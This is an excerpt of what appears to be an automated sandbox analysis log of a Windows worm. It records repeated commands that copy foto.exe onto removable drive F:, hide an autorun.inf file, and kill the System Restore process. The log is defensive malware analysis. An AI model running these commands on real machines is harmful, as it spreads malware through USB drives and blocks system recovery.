    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Drops autorun.inf file
    PID:2464
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    PID:1324
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:1740
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:3700
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:3572
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3676
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:5108
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:224
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Sets file to hidden
    PID:3696
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3212
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:4344
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4328
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:1996
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    PID:1396
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:4220
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:1468
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:2252
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1876
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:1184
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    - Enumerates system info in registry
    PID:1540
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:4400
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1332
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:3284
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:5112
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Drops autorun.inf file
    PID:4636
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4880
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:1652
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2868
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Views/modifies file attributes
    PID:4860
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3124
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:4376
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2732
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Drops autorun.inf file
    PID:2112
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4052
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:3672
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    - Enumerates system info in registry
    PID:2496
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Views/modifies file attributes
    PID:4236
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2284
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2432
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:3280
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Views/modifies file attributes
    PID:4424
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1516
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:4248
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:1532
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:4864
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4548
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2512
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    - Enumerates system info in registry
    PID:3588
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Drops autorun.inf file
    PID:3372
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:4528
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:4852
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2032
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Views/modifies file attributes
    PID:3344
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:4464
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    - Enumerates system info in registry
    PID:3408
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:1704
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:3928
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2948
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:880
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:3208
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Sets file to hidden
    PID:3560
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:5052
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:4664
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:3832
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:3792
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3604
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:996
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:740
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:2456
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4492
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:5088
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:904
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Drops autorun.inf file
    - Views/modifies file attributes
    PID:4452
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1312
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:1492
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:3220
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Sets file to hidden
    - Views/modifies file attributes
    PID:3676
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:5108
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2708
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2788
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:3212
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Kills process with taskkill
    PID:2012
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:1996
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2264
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:1524
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Kills process with taskkill
    PID:3768
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2252
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    - Enumerates system info in registry
    PID:2364
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:1732
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:4544
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:3504
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:3256
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:1640
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:2532
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:4632
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:4880
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:2220
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:1504
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:3048
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2912
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Drops autorun.inf file
    PID:3760
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:3940
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:712
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:4056
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:4476
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:4780
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:4996
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:3236
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Sets file to hidden
    - System Location Discovery: System Language Discovery
    PID:1780
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:3984
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:4920
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    - Enumerates system info in registry
    PID:4684
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:3852
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:116
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2340
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:4856
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:4916
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:3588
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:716
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:3384
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:1552
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1152
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2324
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:4868
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Sets file to hidden
    PID:5020
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:4792
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:3508
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:3576
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:4576
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:1616
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:4828
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:4832
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Views/modifies file attributes
    PID:4032
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:5104
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:5044
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2936
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:3028
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Kills process with taskkill
    PID:3472
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:4520
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:4112
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Drops autorun.inf file
    PID:2464
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:2128
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:4696
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:4372
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Drops autorun.inf file
    PID:3156
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:3020
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2612
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2712
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:4316
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:5108
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2788
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:3212
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Views/modifies file attributes
    PID:1388
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4500
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2264
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:1524
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:4984
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:1052
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:372
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:1732
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Drops autorun.inf file
    - System Location Discovery: System Language Discovery
    PID:1540
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4544
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:3284
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:508
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Drops autorun.inf file
    PID:3736
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:1012
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2868
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:5092
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:1504
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:3048
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2732
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    - Enumerates system info in registry
    PID:4804
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:4008
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:712
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    - Enumerates system info in registry
    PID:4476
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:4236
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Drops autorun.inf file
    PID:4780
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:4996
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    - Enumerates system info in registry
    PID:2236
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:1472
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Sets file to hidden
    PID:4208
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:3040
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2548
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:3564
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:4864
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:4548
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:4856
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:3372
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:3052
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Kills process with taskkill
    PID:3204
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:3764
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:4344
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:2508
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:4676
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:4292
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:5068
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:3928
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:3068
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:4952
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:3208
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:3448
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Kills process with taskkill
    PID:360
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4796
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1616
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:4828
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:4832
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:4120
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:5104
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Sets file to hidden
    - Drops autorun.inf file
    PID:5044
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:2936
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:4036
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:4492
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Drops autorun.inf file
